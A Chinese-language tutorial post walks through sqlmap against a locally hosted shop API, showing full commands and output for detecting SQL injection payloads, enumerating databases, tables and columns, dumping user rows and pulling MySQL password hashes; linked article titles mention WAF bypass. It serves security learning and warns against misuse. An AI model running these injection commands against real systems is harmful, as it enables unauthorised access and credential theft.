sqlmap

Sqlmap 是一个开源的渗透测试工具,可以自动检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多针对最终渗透测试人员的小众功能,以及从数据库指纹、从数据库获取数据、访问底层文件系统和通过带外连接在操作系统上执行命令等广泛的开关。

安装

pip install sqlmap

查看帮助文档

sqlmap -hh

中文文档

https://sqlmap.campfire.ga/

直连数据库

服务型数据库(mysql)

DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

sqlmap -d "mysql://root:123456@127.0.0.1:3306/uniapp_shop" -f --banner --dbs --users

文件型数据库(sqlite)

DBMS://DATABASE_FILEPATH

sqlmap -d "sqlite3://D:\apiTestDjango\db.sqlite3" -f --banner --dbs --tables

初级实战

此处使用的是本地的服务,目的在于学习sqlmap的使用,请不要做违法的事情

扫描项目源码为: https://gitee.com/zy7y/uniapp_shop_server

1. 扫描注入点

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1

        ___

       __H__

 ___ ___[,]_____ ___ ___  {1.5.5#pip}

|_ -| . ["]     | .'| . |

|___|_  [.]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:34:37 /2021-05-14/

[13:34:37] [INFO] resuming back-end DBMS 'mysql'

[13:34:37] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[13:34:37] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:34:37 /2021-05-14/

# Title: Generic UNION query (NULL) - 5 columns 注入点

2. 根据注入点查到全部数据库 --dbs

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.5.5#pip}

|_ -| . [']     | .'| . |

|___|_  ["]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:40:12 /2021-05-14/

[13:40:12] [INFO] resuming back-end DBMS 'mysql'

[13:40:12] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[13:40:12] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[13:40:12] [INFO] fetching database names

available databases [6]:

[*] atplant

[*] information_schema

[*] mysql

[*] performance_schema

[*] sys

[*] uniapp_shop

[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:40:12 /2021-05-14/

3. 根据指定数据库来查所有表

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

        ___

       __H__

 ___ ___[.]_____ ___ ___  {1.5.5#pip}

|_ -| . [(]     | .'| . |

|___|_  [,]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:57:46 /2021-05-14/

[14:57:47] [INFO] resuming back-end DBMS 'mysql'

[14:57:47] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[14:57:47] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:57:47] [INFO] fetching tables for database: 'uniapp_shop'

Database: uniapp_shop

[36 tables]

+----------------------------+

| dt_article                 |

| dt_article_albums          |

| dt_article_attach          |

| dt_article_attribute_field |

| dt_article_attribute_value |

| dt_article_category        |

| dt_article_comment         |

| dt_brands                  |

| dt_channel                 |

| dt_channel_field           |

| dt_channel_site            |

| dt_express                 |

| dt_feedback                |

| dt_link                    |

| dt_mail_template           |

| dt_manager                 |

| dt_manager_log             |

| dt_manager_role            |

| dt_manager_role_value      |

| dt_navigation              |

| dt_order_goods             |

| dt_orders                  |

| dt_payment                 |

| dt_sms_template            |

| dt_user_amount_log         |

| dt_user_attach_log         |

| dt_user_code               |

| dt_user_group_price        |

| dt_user_groups             |

| dt_user_login_log          |

| dt_user_message            |

| dt_user_oauth              |

| dt_user_oauth_app          |

| dt_user_point_log          |

| dt_user_recharge           |

| dt_users                   |

+----------------------------+

[14:57:47] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:57:47 /2021-05-14/

3.根据表来爆字段(mysql版本>5.0)

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

        ___

       __H__

 ___ ___[)]_____ ___ ___  {1.5.5#pip}

|_ -| . [)]     | .'| . |

|___|_  ["]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:59:01 /2021-05-14/

[14:59:01] [INFO] resuming back-end DBMS 'mysql'

[14:59:01] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[14:59:01] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop'

Database: uniapp_shop

Table: dt_users

[22 columns]

+-----------+--------------+

| Column    | Type         |

+-----------+--------------+

| exp       | int          |

| address   | varchar(255) |

| amount    | double       |

| area      | varchar(255) |

| avatar    | varchar(255) |

| birthday  | timestamp    |

| email     | varchar(50)  |

| group_id  | int          |

| id        | int          |

| mobile    | varchar(20)  |

| msn       | varchar(100) |

| nick_name | varchar(100) |

| password  | varchar(100) |

| point     | int          |

| qq        | varchar(20)  |

| reg_ip    | varchar(20)  |

| reg_time  | timestamp    |

| salt      | varchar(20)  |

| sex       | varchar(20)  |

| status    | int          |

| telphone  | varchar(50)  |

| user_name | varchar(100) |

+-----------+--------------+

[14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:59:02 /2021-05-14/

4. 根据字段名查到表中的数据

注意:当使用了--dump 已经触法了法律,请不要恶意攻击他人服务

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.5.5#pip}

|_ -| . [)]     | .'| . |

|___|_  [']_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:03:52 /2021-05-14/

[15:03:52] [INFO] resuming back-end DBMS 'mysql'

[15:03:52] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -

---

[15:03:52] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop'

Database: uniapp_shop

Table: dt_users

[1 entry]

+-----------+----+

| user_name | id |

+-----------+----+

| test      | 1  |

+-----------+----+

[15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv'

[15:03:53] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 15:03:53 /2021-05-14/

5. 获取当前数据库用户及hash密码

命令: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

        ___

       __H__

 ___ ___[(]_____ ___ ___  {1.5.5#pip}

|_ -| . [']     | .'| . |

|___|_  [(]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:40:02 /2021-05-14/

[14:40:02] [INFO] resuming back-end DBMS 'mysql'

[14:40:02] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: newid (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: newid=13 AND 6236=6236

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query

    Title: Generic UNION query (NULL) - 5 columns

    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -

---

[14:40:02] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.12

[14:40:02] [INFO] fetching database users password hashes

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y

do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y

[14:40:05] [WARNING] no clear password(s) found

database management system users password hashes:

[*] develop [1]:

    password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD

[*] mysql.infoschema [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] mysql.session [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] mysql.sys [1]:

    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED

[*] root [2]:

    password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC

    password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3

[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:40:05 /2021-05-14/

最后

请不要恶意使用其来攻击他人服务,不要触碰法律,高级用法请查看官方文档

参考资料

sqlmap中文文档

sql注入实战讲解

SQL注入:Sqlmap初体验的更多相关文章

  1. Spring JDBCTemplate连接SQL Server之初体验

    前言 在没有任何框架的帮助下我们操作数据库都是用jdbc,耗时耗力,那么有了Spring,我们则不用重复造轮子了,先来试试Spring JDBC增删改查,其中关键就是构造JdbcTemplate类. ...

  2. SQL注入--SQLMap过WAF

    单引号被过滤情况: 空格.等号未被过滤情况: select被过滤情况: 以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤. 比如空格被过滤可以使用space2com ...

  3. 一次对真实网站的SQL注入———SQLmap使用

    网上有许多手工注入SQL的例子和语句,非常值得我们学习,手工注入能让我们更加理解网站和数据库的关系,也能明白为什么利用注入语句能发现网站漏洞. 因为我是新手,注入语句还不太熟悉,我这次是手注发现的注点 ...

  4. Saturday SQL Server 2016 初体验

    最近在开发一个有关数据库的项目,我想用SQLite,但是SQLite的设计器不是特别友好,然后据说VS有一个集成的SQLite设计器,但是我用的VS2017亲测并没有,用户体验不佳,所以安装一个SQL ...

  5. 普通SQL注入

    安全防御:过滤/转义非法参数,屏蔽SQL查询错误. 工具:Firefox,hackbar,sqlmap,burpsuite 1.联想tms站 例1, 联想tms站fromCity参数存在普通SQL注入 ...

  6. SQL注入(dvwa环境)

    首先登录DVWA主页: 1.修改安全级别为LOW级(第一次玩别打脸),如图中DVWA Security页面中. 2.进入SQL Injection页面,出错了.(心里想着这DVWA是官网下的不至于玩不 ...

  7. 2017-2018-2 20179204《网络攻防实践》第十一周学习总结 SQL注入攻击与实践

    第1节 研究缓冲区溢出的原理,至少针对两种数据库进行差异化研究 1.1 原理 在计算机内部,输入数据通常被存放在一个临时空间内,这个临时存放的空间就被称为缓冲区,缓冲区的长度事先已经被程序或者操作系统 ...

  8. sql注入知识点

    需找sql注入点1\无特定目标inurl:.php?id= 2\有特定目标:inurl:.php?id= site:target.com 3\工具爬取spider,对搜索引擎和目标网站的链接进行爬取 ...

  9. 防止sql注入和sqlmap介绍

    sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...

随机推荐

  1. 【Azure Developer】Github Action部署资源(ARM模板)到Azure中国区时,遇见登录问题的解决办法

    问题描述 在参考文档"使用 GitHub Actions 部署 ARM 模板"一文中,由于是在中国区Azure上操作,所以生产的部署凭证为中国区凭证.当创建工作流时,在登录到Azu ...

  2. C++ 虚函数的内部实现

    C++ 虚函数的内部实现 虚函数看起来是个玄之又玄的东西,但其实特别简单!了解了虚函数的内部实现,关于虚函数的各种问题都不在话下啦! 1. 知识储备 阅读这篇文章,你需要事先了解以下几个概念: 什么是 ...

  3. [深搜]C. 【例题3】虫食算

    C . [ 例 题 3 ] 虫 食 算 题目解析 正解 : Dfs + 剪枝 依题意,把样例以加法的形式展现出来. 根据加法的性质,可以得出有两种情况:有进位和没有进位的. 而从百位到最高位的结果,又 ...

  4. 2020牛客NOIP赛前集训营-普及组(第二场)A-面试

    面 试 面试 面试 题目描述 牛牛内推了好多人去牛客网参加面试,面试总共分四轮,每轮的面试官都会对面试者的发挥进行评分.评分有 A B C D 四种.如果面试者在四轮中有一次发挥被评为 D,或者两次发 ...

  5. 实际使用Elasticdump工具对Elasticsearch集群进行数据备份和数据还原

    文/朱季谦 目录 一.Elasticdump工具介绍 二.Elasticdump工具安装 三.Elasticdump工具使用 最近在开发当中做了一些涉及到Elasticsearch映射结构及数据导出导 ...

  6. AutoAssign源码分析

    目录 AutoAssign源码分析 一. 简介 二. 论文理论 2.1 联合表示 2.2 正样本权重 2.3 负样本权重 2.4 总的loss 2.5 补充loss 三. 论文代码 四. 总结 五. ...

  7. OO结课了,狂喜

    OO结课了,狂喜 哈哈哈哈哈 哈哈哈 哈哈 哈 第十三次作业 UML类图 简要分析: 本次作业是对UML类图进行解析,给到的接口里面已经有了很多类了,但是自带的类肯定是没有反应这些类的结构的.所以就自 ...

  8. spring-cloud-gateway 服务网关

    Spring Cloud Gateway是Spring Cloud官方推出的第二代网关框架,取代Zuul网关.网关作为流量的,在微服务系统中有着非常作用,网关常见的功能有路由转发.权限校验.限流控制等 ...

  9. php-mysql-防止sql注入

    1.防止sql注入-预准备 mysqli: $qSelect = $DBH->prepare("SELECT * FROM users WHERE username = ?" ...

  10. 跟我一起学Go系列:从写测试用例开始仗剑走天涯

    从入门到深入 Go 我们已经走了很长的路,当你想启动多个测试类的时候你是不是想启动多个 main 方法,但是 Go 限制了在同一个 package 下只能有一个 main,所以这条路你是走不通的.那我 ...